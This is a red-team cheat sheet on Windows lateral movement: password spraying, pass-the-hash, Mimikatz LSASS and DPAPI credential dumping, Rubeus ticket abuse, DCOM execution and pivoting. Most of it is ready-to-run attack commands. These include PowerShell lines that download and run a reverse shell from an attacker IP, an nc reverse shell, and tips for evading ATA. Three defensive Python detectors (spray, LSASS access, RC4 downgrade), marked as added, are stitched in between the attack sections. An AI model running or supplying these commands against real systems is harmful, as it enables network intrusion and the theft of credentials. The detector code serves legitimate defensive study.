Lateral Movement

Tips

  • Blend in with internal protocols:
    • SMB (PsExec, schtasks, sc, WMIC)
    • RDP
    • SSH
    • VNC
    • WinRM (PowerShell)


Firewall configuration

netsh advfirewall firewall add rule name="firestone proxy" dir=in action=allow protocol=tcp localport=45001

Password Spraying

crackmapexec smb <IP/24> -u usernames -p Passwords --continue-on-success --ufail-limit 3
crackmapexec smb 192.168.10.11 -u Administrator -p '[email protected]' -x whoami --shares
crackmapexec smb 10.55.100.0/24 -u winlab -H <Hash> --local-auth --lsa

#kerbrute's spray subcommand is a single word
./kerbrute_linux_amd64 passwordspray -v -d <domain> --dc <IP> users.txt <Pass>

#Brute-force password
./kerbrute_linux_amd64 bruteuser --dc <IP> -d <domain.local> rockyou.txt <username>

pth-winexe //<IP> -U <Username>%<Pass/hash> cmd

evil-winrm -u <username> -H <Hash> -i <IP>

psexec.py <hostname>/Administrator:<password>@192.168.1.104
psexec.py <domain>.<local>/[email protected]<IP> -hashes "<hash>"
git clone https://github.com/Greenwolf/Spray.git
./spray.sh -smb 172.31.3.8 /users.txt /pass.txt <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <Domain> skipuu
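A defender-side counterpart to the spraying commands above, added here as an example and not taken from the page or from any of the tools it lists. It reads failed-logon records (constructed sample data standing in for Event ID 4625 exports with their TimeCreated, IpAddress and TargetUserName fields) and flags a source that fails against many distinct accounts with only one or two attempts each inside a short window: that breadth-with-low-depth pattern is what a lockout-aware spray (the `--ufail-limit` and `<AttemptsPerLockoutPeriod>` knobs above) leaves behind, and a user mistyping their own password does not. The record layout and the thresholds are assumptions to tune per environment.

```python
"""Password-spray detection over failed-logon records.

Added example, not from the original page: a spray touches many accounts
from one source with one or two attempts each; a brute force hammers one
account. The sample records are constructed stand-ins for Event ID 4625
exports (TimeCreated, IpAddress, TargetUserName).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: (TimeCreated, IpAddress, TargetUserName)
SAMPLE_FAILED_LOGONS = [
    ("2024-05-01T09:00:01", "10.55.100.200", "alice"),
    ("2024-05-01T09:00:02", "10.55.100.200", "bob"),
    ("2024-05-01T09:00:03", "10.55.100.200", "carol"),
    ("2024-05-01T09:00:04", "10.55.100.200", "dave"),
    ("2024-05-01T09:00:05", "10.55.100.200", "erin"),
    ("2024-05-01T09:00:06", "10.55.100.200", "frank"),
    # one user mistyping their own password: many failures, one account
    ("2024-05-01T09:10:00", "10.55.100.50", "alice"),
    ("2024-05-01T09:10:05", "10.55.100.50", "alice"),
    ("2024-05-01T09:10:09", "10.55.100.50", "alice"),
    # two unrelated failures 40 minutes apart: below threshold
    ("2024-05-01T09:00:00", "10.55.100.77", "gina"),
    ("2024-05-01T09:40:00", "10.55.100.77", "hank"),
]


def detect_spray(events, window_minutes=10, min_accounts=5, max_per_account=2):
    """Return {source_ip: sorted accounts} for every source that fails
    against at least `min_accounts` distinct accounts within any
    `window_minutes` window without trying any single account more than
    `max_per_account` times. Thresholds are assumptions to tune locally:
    a spray stays under the lockout threshold on purpose, so low per-account
    depth combined with breadth is the signal."""
    by_source = defaultdict(list)
    for ts, source, account in events:
        by_source[source].append((datetime.fromisoformat(ts), account))

    window = timedelta(minutes=window_minutes)
    findings = {}
    for source, attempts in by_source.items():
        attempts.sort()
        # slide a window anchored at each attempt in turn
        for i, (start, _) in enumerate(attempts):
            in_window = [acct for t, acct in attempts[i:] if t - start <= window]
            per_account = defaultdict(int)
            for acct in in_window:
                per_account[acct] += 1
            if (len(per_account) >= min_accounts
                    and max(per_account.values()) <= max_per_account):
                findings[source] = sorted(per_account)
                break
    return findings


if __name__ == "__main__":
    for source, accounts in detect_spray(SAMPLE_FAILED_LOGONS).items():
        print(f"possible spray from {source}: {len(accounts)} accounts {accounts}")
```

Run against a real export by replacing `SAMPLE_FAILED_LOGONS` with tuples pulled from your SIEM; Kerberos pre-auth failures (Event ID 4771) fit the same shape and catch the kerbrute variant, which never produces a 4625.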
#PTH-Winexe
pth-winexe -U Administrator%<HASH> //<IP> cmd
pth-winexe --system -U 'admin%<HA:SH>' //192.168.1.22 cmd.exe

#WMI
wmic /node:COMPUTER /user:DOMAIN\USER /password:PASSWORD process call create "COMMAND"
#PowerShell (WMI)
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList $COMMAND -ComputerName $COMPUTER -Credential $CRED
#wmiexec
#Does not drop into NT Authority/SYSTEM

#WinRM (-H takes the NT hash)
evil-winrm -u 'user' -H '<NT hash>' -i <IP> -s <PS_SCRIPTS_LOCAL_PATH>

winrs -r:COMPUTER COMMAND

#PowerShell Remoting
Invoke-Command -ComputerName $COMPUTER -ScriptBlock { $COMMAND }
New-PSSession -Name PSCOMPUTER -ComputerName $COMPUTER; Enter-PSSession -Name PSCOMPUTER

iex (iwr http://<IP>/Invoke-Mimikatz.ps1 -UseBasicParsing)
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

Kerberos Double Hop Workaround

If you obtain the shell through pass-the-hash or pass-the-ticket, you perform a network logon, which means you run into the Kerberos double-hop issue.
The way around it is to perform an interactive logon, but that requires the clear-text credentials.
PSRemoting uses pass-the-ticket. This is how Kerberos is meant to work and is a limitation of it; it is the entire reason Kerberos delegation was invented.
Often the simplest way is to perform process migration/injection into a SYSTEM process and act from there, since that runs in the context of the computer account, which did an interactive logon at startup.
$username = 'devmanager'
$password = 'F0rRunning$cheduledTasks!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command -ComputerName CASC-DC1.CASCADE.LOCAL -Credential $credential -ScriptBlock {powershell.exe -c "IEX(iwr http://10.10.14.22/Invoke-PowerShellTcp.ps1 -UseBasicParsing)" }

#Invoke hostname on 3rd server
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
    Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}

#Port forwarding from host to Target's WinRM
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
#Connect through the forwarder (listen address and port from above)
Enter-PSSession -ComputerName 10.35.8.17 -Port 5446 -Credential domain\user

#Ref: https://posts.slayerlabs.com/double-hop/
#Creates a new session configuration on the remote computer;
#when connected, it forces the session to always run with the credential provided.
Invoke-Command -ComputerName <Hop1PC> -ScriptBlock { Register-PSSessionConfiguration -Name Creds -RunAsCredential <domain-name>\<domainaccount> -Force }
Invoke-Command -ComputerName <Hop1PC> -ConfigurationName Creds -ScriptBlock { \\<Kali-IP>\revshell.exe 10.10.x.x 4445 }

#Run a process as a different user
$secpasswd = ConvertTo-SecureString "<pass>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<domain\username>", $secpasswd)
$computer = "<COMPUTER_NAME>"

#$Using: is only valid inside a remote script block; locally use the variable directly
Start-Process powershell.exe -Credential $mycreds -NoNewWindow
#Troubleshoot
$s = New-PSSession -ComputerName $computer -Credential $mycreds
Invoke-Command -Session $s -ScriptBlock {whoami}

#Enable RDP on target
#1. Add yourself to the Remote Desktop Users group
#2. Enable on target using PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

#3. Execute from a shell. Do not execute from a PSRemoting session.
#If you execute the following commands from a remote PowerShell session you will be disconnected, because the RDP listen port is set to 5985,
#so WinRM has to be stopped with sc.exe before starting Remote Desktop Services.

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name PortNumber -Value 5985
sc.exe stop WinRM
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

#Runas
runas /netonly /user:garrison.local\Administrator powershell.exe
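The RDP-enable and portproxy commands above each change a specific registry value, which gives a defender something concrete to audit after an incident. The following is an added example, not from the page: it parses a `.reg` export (a constructed sample is embedded; in a real investigation the text comes from `reg export` of the keys in question) and reports RDP being switched on, the RDP listener being moved off 3389, and any netsh portproxy forwarders, which survive reboots under the `PortProxy\v4tov4\tcp` service key. The two Terminal Server paths are the ones used in the commands above; the PortProxy key is where netsh stores v4tov4 rules.

```python
"""Audit a registry export for the RDP and portproxy changes shown above.

Added example, not from the page: parses a .reg text export (constructed
sample below) and reports settings a lateral-movement playbook flips.
"""
import re

# Constructed sample of what `reg export` would emit for the three keys.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001761
"UserAuthentication"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp]
"10.35.8.17/5446"="10.35.8.23/5985"
"""

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"
# netsh interface portproxy persists its v4tov4 TCP rules under this key
PORTPROXY_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp"
RDP_DEFAULT_PORT = 3389

# "name"=dword:xxxxxxxx or "name"="string"; other value kinds are ignored here
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?:dword:(?P<dword>[0-9a-fA-F]{8})|"(?P<str>.*)")$')


def parse_reg(text):
    """Return {key_path: {value_name: int | str}}. Registry paths and
    value names are case-insensitive, so both are folded to lower case."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = m.group("name").lower()
            if m.group("dword") is not None:
                keys[current][name] = int(m.group("dword"), 16)
            else:
                keys[current][name] = m.group("str")
    return keys


def audit(keys):
    """Return human-readable findings in a fixed order."""
    findings = []
    ts = keys.get(TS_KEY.lower(), {})
    if ts.get("fdenytsconnections") == 0:
        findings.append("RDP enabled: fDenyTSConnections=0")
    rdp = keys.get(RDP_TCP_KEY.lower(), {})
    port = rdp.get("portnumber", RDP_DEFAULT_PORT)
    if port != RDP_DEFAULT_PORT:
        findings.append(f"RDP listener moved to non-default port {port}")
    for listen, connect in sorted(keys.get(PORTPROXY_KEY.lower(), {}).items()):
        findings.append(f"portproxy forwarder persists: {listen} -> {connect}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print("FINDING:", finding)
```

Whether "RDP enabled" is a finding depends on the host's baseline; the port move and any portproxy entry are almost never legitimate on a workstation and are the two to alert on unconditionally.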

psexec

  • Requires a CIFS ticket for the target.
  • Requires manual deletion of the service using sc
#psexec. Drops into NT Authority/SYSTEM
psexec.py BLACKFIELD.local/<user>@<IP> -hashes ":<NT hash>"

#Execute local executable on remote system
psexec.exe \\REMOTECOMPUTER -i -c <localfile.exe> /accepteula

#Execute as SYSTEM
psexec -s cmd

#Enable PSRemoting remotely
$computerName = 'REMOTECOMPUTER'
psexec "\\$computerName" -s c:\windows\system32\winrm.cmd quickconfig -quiet 2>&1 > $null
#OR

PowerShell Remoting

Types:
  • One-to-one
    • Runs in a process: wsmprovhost
    • Stateful
    • Requires local admin privileges on the target
    • Credentials are not left on the target unless CredSSP or constrained delegation is in use
  • One-to-many
    • Run commands and scripts on thousands of machines, even as background jobs.
    • Ideal for passing hashes and using credentials on multiple computers.
    • Commands are executed in parallel
    • Non-interactive
    • Cmdlet: Invoke-Command

Start an Interactive Session

  • Tip: Find machines where current user has Local Admin Access using Find-LocalAdminAccess.
#Works on machines where the current user has local admin access.
Enter-PSSession -ComputerName pc1.domain.local

Enter-PSSession -ComputerName 192.168.0.2 -Credential domain\username

#Create a new session
New-PSSession -ComputerName 192.168.0.2 -Credential domain\username
Enter-PSSession -ComputerName 192.168.0.2 -Credential domain\username

#List sessions
Get-PSSession -ComputerName 192.168.0.2 -Credential domain\username

Exit-PSSession

#Stateful property
$sess = New-PSSession -ComputerName pc1.domain.local
Enter-PSSession -Session $sess
$proc = Get-Process
#Exit and reconnect; $proc is still populated because the session keeps its state
Exit-PSSession
Enter-PSSession -Session $sess
$proc

Enable PS Remoting Remotely

$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName remote-computer -Credential domain\user -ArgumentList $command

#With DA privileges
#https://github.com/samratashok/RACE
Set-RemotePSRemoting -SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Execute Commands

Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <File containing list of servers>)
Invoke-Command -Session $sessionname -FilePath 'path to the powershell script'
#Where the session argument is:
$sessionname = New-PSSession -ComputerName <IP> -Credential <domain\username> -Name anysessionname

#Load from function store
. .\name_of_function.ps1
Invoke-Command -ComputerName Server01 -ScriptBlock ${function:name_of_function}
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

#Opens new cmd window
runas /user:<domain>\<user> cmd.exe

#Start a process as another user
$username = "DOMAIN\USER"
$password = "PASSWORD"
$credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
Start-Process nc64.exe -ArgumentList '-e cmd.exe xx.xx.xx.xx 80' -Credential ($credentials)

SharpSploit

menu
SharpSploit.Credentials.Mimikatz.SamDump()

Mimikatz

The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. LSA Protection prevents non-protected processes from interacting with LSASS; Mimikatz can still bypass this with a driver.
  • Run PowerShell as Administrator.
  • Using the code from ReflectivePEInjection, Mimikatz is loaded reflectively into memory. All Mimikatz functions can then be used from this script.
  • Requires administrator and often debug rights.
#Ways to dump credentials from memory

--
#Dump LSASS (Task Manager, procdump, comsvcs.dll)
get-process lsass
tasklist | findstr lsass
procdump.exe -accepteula -ma "lsass.exe" out.dmp
procdump.exe -accepteula -ma 580 out.dmp
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\out.dmp full

crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa

#From Windows
sekurlsa::minidump c:\lsass.dmp
log lsass.txt
sekurlsa::logonPasswords

#From Linux
pypykatz lsa minidump lsass.DMP
--


#Enable WDigest to store clear-text credentials
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
sekurlsa::wdigest

sekurlsa::logonpasswords

privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
kerberos::ptt <file>.kirbi
misc::skeleton

lsadump::lsa /inject
token::elevate
lsadump::sam
lsadump::secrets
lsadump::trust /patch
lsadump::lsa /patch

lsadump::dcsync /user:dcorp\krbtgt

#Cached logons. Can't perform "pass-the-hash" style attacks with this type of hash.
"token::elevate" "lsadump::cache"
hashcat -m2100 '$DCC2$10240#<NAME>#<HASH>' /usr/share/wordlists/rockyou.txt --force --potfile-disable

#Restore NT hash of a user
lsadump::setntlm /user:<user> /ntlm:<hash>

#Export private certificates
Invoke-Mimikatz -DumpCerts

#SSP Attack: Store passwords of all logins in clear-text to c:\Windows\System32\mimilsa.log
"privilege::debug" "misc::memssp"

-----
#Credential Manager
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Vault"
"vault::list"

#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Credentials"
"vault::cred"

#List plain-text creds [Risky]
"vault::cred" /patch

-----
#DPAPI Abuse

dir /a c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\

#Copy Master Key
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\

#Grab GUID Master Key value
dir /a c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value>

#Grab Master Key to Decrypt
dpapi::masterkey /in:c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value> /rpc

#Decrypt
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file> /masterkey:<Key value from above command>

--
#Dump Domain-wide DPAPI Backup Key from DC
lsadump::backupkeys /system:<DC> /export

#Decrypt target user's master key using DPAPI Backup key
dpapi::masterkey /in:"<User-master-key>" /pvk:"Domain-backup-key"

#Decrypt cookie values with target user's master key
dpapi::chrome /masterkey:<user-master-key> /in:<Path-to-chrome-cookies>
--
#Crack masterkey with user's clear-text pass
dpapi::masterkey /in:<Users-key> /sid:<User-SID> /password:<password> /protected

#Without knowing the password, but with code exec, extract domain key from DC
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<Master-key-GUID>" /rpc

#Decrypt credentials from Windows Vault using master key
dpapi::cred /in:<creds> /masterkey:<masterkey> /unprotect
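Every LSASS dumping method in the block above (procdump, the comsvcs.dll MiniDump export, the dump that sekurlsa::minidump later parses) has to open a handle to lsass.exe with memory-read rights, and Sysmon records such opens as Event ID 10 (ProcessAccess) with SourceImage, TargetImage, GrantedAccess and CallTrace fields. The following is an added example, not from the page or from Mimikatz: it scans constructed Sysmon records and flags handles on lsass.exe from any process outside an allowlist whose GrantedAccess includes PROCESS_VM_READ, raising the severity when comsvcs.dll appears on the call stack. The allowlist, the sample records and the severity scheme are assumptions to tune per environment.

```python
"""Flag handles opened on lsass.exe with memory-read rights.

Added example, not from the page or Mimikatz: every LSASS dumping method in
the block above needs PROCESS_VM_READ on lsass.exe. Sysmon logs such opens
as Event ID 10 (ProcessAccess); the records below are constructed stand-ins.
"""
import ntpath

PROCESS_VM_READ = 0x0010

# Processes that open LSASS legitimately on a typical host. This is an
# assumption to tune per environment (EDR agents, AV engines, and so on).
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed Sysmon Event ID 10 records (only the fields used here)
SAMPLE_SYSMON_10 = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1410", "CallTrace": ""},
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\comsvcs.dll+2a8c"},
    {"SourceImage": r"C:\Program Files\Monitor\agent.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000", "CallTrace": ""},   # QUERY_LIMITED only
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": ""},  # not LSASS
]


def suspicious_lsass_access(events):
    """Return one hit per record that opens lsass.exe with PROCESS_VM_READ
    from a source that is not allowlisted. The comsvcs.dll MiniDump
    technique leaves that DLL on the call stack, which raises severity."""
    hits = []
    for ev in events:
        if ntpath.basename(ev["TargetImage"]).lower() != "lsass.exe":
            continue
        source = ev["SourceImage"].lower()
        if source in BENIGN_SOURCES:
            continue
        access = int(ev["GrantedAccess"], 16)
        if not access & PROCESS_VM_READ:
            continue  # cannot read memory, so cannot dump credentials
        call_trace = ev.get("CallTrace", "").lower()
        severity = "high" if "comsvcs.dll" in call_trace else "medium"
        hits.append({"source": ntpath.basename(source),
                     "access": hex(access), "severity": severity})
    return hits


if __name__ == "__main__":
    for hit in suspicious_lsass_access(SAMPLE_SYSMON_10):
        print(f"[{hit['severity']}] {hit['source']} opened lsass.exe with {hit['access']}")
```

The GrantedAccess mask is the part most worth keeping strict: filtering only on the full 0x1FFFFF mask misses dumpers that ask for exactly PROCESS_QUERY_INFORMATION | PROCESS_VM_READ (0x1010), which is why the check tests the single read bit instead.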

Over Pass The Hash

  • Obtain Kerberos tickets from NTLM hash.
  • An attacker can leverage the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account, but require Kerberos authentication to reach your destination.
  • Likely to cause an alert since the encryption method of the EncryptedTimestamp field in AS_REQ is being downgraded.
  • To make this attack stealthier, use NTLM + AES keys [aes256_hmac + aes128_hmac]
    • aes128 keys can be specified even if they do not actually exist.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'

#To bypass Microsoft ATA, pass AES keys as well.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /aes256:<aeshash> /aes128:<Aes key> /run:powershell.exe"'

#Get a reverse shell using NTLM hash
$Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://<IP>/Invoke-PowerShellTcp.ps1''))'
Out-File -Encoding Ascii -InputObject $Contents -FilePath C:\blah\reverse.bat
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.local /ntlm:<ntlm> /run:C:\blah\reverse.bat"'
Steal token from notepad process.
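The bullets above note that over-pass-the-hash with only an NTLM hash downgrades the Kerberos encryption to RC4 and that this is what ATA alerts on, so it is worth seeing what such a detection keys on. The following is an added example, not from the page or from Mimikatz: it builds a per-account baseline of the encryption types seen in earlier TGT requests (constructed records standing in for Event ID 4768 with its TargetUserName, IpAddress and TicketEncryptionType fields, where 0x17 is RC4-HMAC, 0x12 AES256 and 0x11 AES128) and flags a new RC4 request from an account that has only ever used AES, while staying quiet for legacy accounts that always use RC4. The field names follow the 4768 event; the sample data is invented.

```python
"""Detect a Kerberos encryption downgrade in TGT requests.

Added example, not from the page or Mimikatz. With only an NTLM hash the
AS-REQ can only use RC4-HMAC, so a TGT request (Event ID 4768) with RC4
from an account that otherwise uses AES stands out. Records are constructed.
"""
from collections import defaultdict

RC4_HMAC = 0x17
AES_TYPES = {0x11, 0x12}  # AES128-CTS-HMAC-SHA1-96, AES256-CTS-HMAC-SHA1-96

# Constructed history: (TargetUserName, IpAddress, TicketEncryptionType)
BASELINE_4768 = [
    ("administrator", "10.10.10.5", 0x12),
    ("administrator", "10.10.10.5", 0x12),
    ("administrator", "10.10.10.7", 0x12),
    ("legacysvc", "10.10.10.30", 0x17),   # an account that always uses RC4
    ("legacysvc", "10.10.10.30", 0x17),
    ("alice", "10.10.10.41", 0x12),
]

# Constructed new events to evaluate against that history
NEW_4768 = [
    ("administrator", "10.10.14.22", 0x17),  # AES-only account now using RC4
    ("legacysvc", "10.10.10.30", 0x17),      # normal for this account
    ("alice", "10.10.10.41", 0x12),          # still AES
    ("bob", "10.10.14.22", 0x17),            # no history to compare against
]


def build_baseline(events):
    """Map each account to the set of encryption types seen in its history."""
    seen = defaultdict(set)
    for user, _ip, etype in events:
        seen[user.lower()].add(etype)
    return seen


def detect_downgrade(baseline, events):
    """Return findings for RC4 TGT requests. confidence is "high" when the
    account's history is AES-only and "low" when it has no history at all;
    accounts that already use RC4 are not reported."""
    findings = []
    for user, ip, etype in events:
        if etype != RC4_HMAC:
            continue
        history = baseline.get(user.lower())
        if not history:
            findings.append({"user": user, "ip": ip, "confidence": "low"})
        elif history <= AES_TYPES:
            findings.append({"user": user, "ip": ip, "confidence": "high"})
    return findings


if __name__ == "__main__":
    for f in detect_downgrade(build_baseline(BASELINE_4768), NEW_4768):
        print(f"[{f['confidence']}] RC4 TGT request for {f['user']} from {f['ip']}")
```

This is also why the page's advice to pass the AES keys along with the NTLM hash matters from the defender's side: with a correct AES key in hand, the request looks like the account's normal traffic and this baseline check no longer fires, so it should be paired with source-host and logon-pattern checks rather than relied on alone.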

Rubeus

#Convert clear-text password to hash
Rubeus.exe hash /password:Password123!
Rubeus.exe hash /password:Password123! /user:harmj0y /domain:testlab.local

#Request a TGT
Rubeus.exe asktgt /user:<user> /rc4:<hash> /ptt

#S4U: request a service ticket impersonating Administrator
.\Rubeus.exe s4u /user:<user A> /rc4:<User A's hash> /impersonateuser:Administrator /msdsspn:"CIFS/<Service-PC-Name>" /ptt

#.\kekeo.exe
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
#Request TGS
tgs::s4u /tgt:<TGT-file.kirbi> /user:[email protected]<domain> /service:cifs/dcorpmssql.dollarcorp.moneycorp.LOCAL

#Monitor for new TGTs
.\Rubeus.exe monitor /interval:5 /nowrap

#By default TGTs are valid for 10h. However, TGTs can be renewed for up to 7 days
Rubeus.exe renew /ticket:<ticket> /autorenew

DCOM

  • DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.
  • Requires LA privileges on target.
  • Requires the presence of Microsoft Office on the target computer.
#Outlook
#Reference: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

$com = [Type]::GetTypeFromProgID('Outlook.Application','192.168.99.152')
$object = [System.Activator]::CreateInstance($com)
$RemoteScriptControl = $object.CreateObject("ScriptControl")

#Compile the "payload" in C#, pass it to DotNetToJScript and save the output to $code
$RemoteScriptControl.Language = "JScript"
$RemoteScriptControl.AddCode($code)


#Excel: Create a macro-enabled Excel workbook (.xlsm)
#Reference: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application","<Remote-IP>"))
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")

#PSScript: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b
Invoke-ExcelMacroPivot -Target "192.168.99.152" -RemoteDocumentPath "C:\Book1.xlsm" -MacroName "Auto_Open"

#PowerPoint: Create a PowerPoint add-in from this content; it must be saved as either a PPA or a PPAM file
#Reference: https://attactics.org/2018/02/dcom-lateral-movement-powerpoint/
#PSScript: https://github.com/attactics/Invoke-DCOMPowerPointPivot/blob/master/Invoke-DCOMPowerPointPivot.ps1

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("PowerPoint.Application", "10.10.10.10"))
$addin = $com.AddIns.Add("c:\testfile.ppam")

WMI

Port Forwarding

gss-api proxy

  • This creates a proxy on port 8080 on the target.
  • Once a port forward is set up to the attacker's host, gssapi-proxy lets us hijack the victim's active Kerberos tickets to access intranet sites.
#May need to bypass UAC initially
https://github.com/mikkolehtisalo/gssapi-proxy

Firewall Rules Modification

netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT

#Metasploit
use multi/manage/autoroute

#Reverse port forward (meterpreter)
portfwd add -R -p <Remote pivot port> -l <Local port to listen on> -L <Local Host IP to listen on>

#Set up SOCKS proxy [/etc/proxychains.conf]
use auxiliary/server/socks4a
#to same as -l
  • Download from here
  • Copy binary + Private_Key.ppk to target.
  • Establish reverse connection to the attacker's SSH server to create an SSH tunnel.
gedit /etc/ssh/sshd_config
Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers.
  • Transfer binary to the target
  • Use it to create a reverse connection. cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT [email protected]_IP -i KEYFILE -N
  • Keys will not work properly here. Convert from id_rsa to KEY.ppk
#Generate SSH keys using ssh-keygen, then convert the private key to PuTTY format
sudo apt install putty-tools
puttygen KEYFILE -o OUTPUT_KEY.ppk
The resulting .ppk file can then be transferred to the Windows target and used in exactly the same way as with the Reverse port forwarding taught in the previous task (despite the private key being converted, it will still work perfectly with the same public key we added to the authorized_keys file)

Proxy

- Article on using a proxy to an internal network: https://www.blackhillsinfosec.com/a-toast-to-kerberoast/

#Proxychains
#/etc/proxychains.conf [disable 'proxy_dns']
socks4 127.0.0.1 8080

#For Kerberos to work, add /etc/hosts entries for both the FQDN and the NetBIOS names
10.10.10.22 small.domain.com
10.10.10.22 dc-01
10.10.10.23 workstation-01

#Metasploit
use auxiliary/server/socks4a
set SRVHOST 0.0.0.0
set SRVPORT 8080
route add 10.10.10.0 255.255.255.0 1
exploit

#Execute required tool
proxychains GetUserSPNs.py -request -dc-ip 10.10.10.103